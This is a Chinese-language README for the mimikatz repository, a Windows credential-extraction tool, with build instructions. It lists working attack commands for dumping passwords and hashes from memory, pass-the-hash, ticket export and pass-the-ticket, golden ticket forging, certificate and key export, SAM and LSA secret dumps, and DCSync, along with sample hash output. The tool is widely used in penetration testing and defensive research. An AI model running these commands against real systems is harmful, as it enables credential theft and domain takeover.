ParrotSec/mimikatz

GitHub: ParrotSec/mimikatz

Windows 凭证提取与 Kerberos 攻击的经典工具,支持从内存获取密码哈希、票据传递、黄金票据构建及 DCSync 等多种攻击技术。

Stars: 2368 | Forks: 336

# mimikatz **`mimikatz`** 是我为了学习 `C` 语言并对 Windows 安全性进行一些实验而制作的工具。 它现在以从内存中提取明文密码、哈希、PIN 码和 kerberos 票据而闻名。**`mimikatz`** 还可以执行哈希传递、票据传递或构建 _Golden tickets_(黄金票据)。 ``` .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... ``` 但这还不是全部!`Crypto`、`Terminal Server`、`Events`……更多信息请参阅 GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki 或 http://blog.gentilkiwi.com(法语,_是的_)。 如果你不想自己构建,可以在这里下载二进制文件:https://github.com/gentilkiwi/mimikatz/releases ## 快速使用 ``` log privilege::debug ``` ### sekurlsa ``` sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd ``` ### kerberos ``` kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi ``` ### crypto ``` crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export ``` ### vault & lsadump ``` vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local ``` ## 构建 `mimikatz` 采用 Visual Studio Solution 和 WinDDK 驱动程序(主要操作可选)的形式,因此前置条件如下: * 对于 `mimikatz` 和 `mimilib`:用于 Desktop 的 Visual Studio 2010、2012 或 2013(**2013 Express for Desktop 是免费的,且支持 x86 和 x64** - http://www.microsoft.com/download/details.aspx?id=44914) * _对于 `mimikatz driver`、`mimilove`(以及 `ddk2003` 平台):Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_ `mimikatz` 使用 `SVN` 进行源代码控制,但现在也支持 `GIT`! 你可以使用任何你喜欢的工具进行同步,甚至是 Visual Studio 2013 中集成的 `GIT` =) ### 同步! * GIT URL 为 :https://github.com/gentilkiwi/mimikatz.git * SVN URL 为 :https://github.com/gentilkiwi/mimikatz/trunk * ZIP 文件为 :https://github.com/gentilkiwi/mimikatz/archive/master.zip ### 构建解决方案 * 打开解决方案后,选择 `Build` / `Build Solution`(你可以更改架构) * `mimikatz` 现已构建完成,随时可以使用!(`Win32` / `x64`,如果你运气好甚至包括 `ARM64`) * 你可能会遇到关于 `_build_.cmd` 和 `mimidrv` 的 `MSB3073` 错误,这是因为如果没有 Windows Driver Kit **7.1** (WinDDK) 就无法构建驱动程序,但 `mimikatz` 和 `mimilib` 是没问题的。 ### ddk2003 通过这个可选的 MSBuild 平台,你可以使用 WinDDK 构建工具以及默认的 `msvcrt` 运行时(二进制文件更小,无依赖项)。 对于这个可选平台,Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 和 Visual Studio **2010** 是必须的,即使你计划之后使用 Visual Studio 2012 或 2013。 请遵循以下说明: * http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme * _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_ ## 许可证 CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/ `mimikatz` 的开发需要咖啡: * PayPal: https://www.paypal.me/delpy/ ## 作者 * Benjamin DELPY `gentilkiwi`,你可以在 Twitter ( @gentilkiwi ) 上联系我,或通过邮件 ( benjamin [at] gentilkiwi.com ) * `lsadump` 模块中的 DCSync 和 DCShadow 功能是与 Vincent LE TOUX 合写的,你可以通过邮件 ( vincent.letoux [at] gmail.com ) 联系他,或访问他的网站 ( http://www.mysmartlogon.com ) 这是一个**个人**开发项目,请尊重其理念,不要将其用于不良行为!
标签:Cloudflare, CTF学习, C 语言, Kerberos 攻击, LSASS 内存, Mimikatz, MITRE ATT&CK, Modbus, NTLM 哈希, RFI远程文件包含, SCADA, Windows 安全, 内网渗透, 凭据转储, 协议分析, 哈希传递, 域渗透, 密码抓取, 权限提升, 模拟器, 电子数据取证, 票据传递, 端点可见性, 黄金票据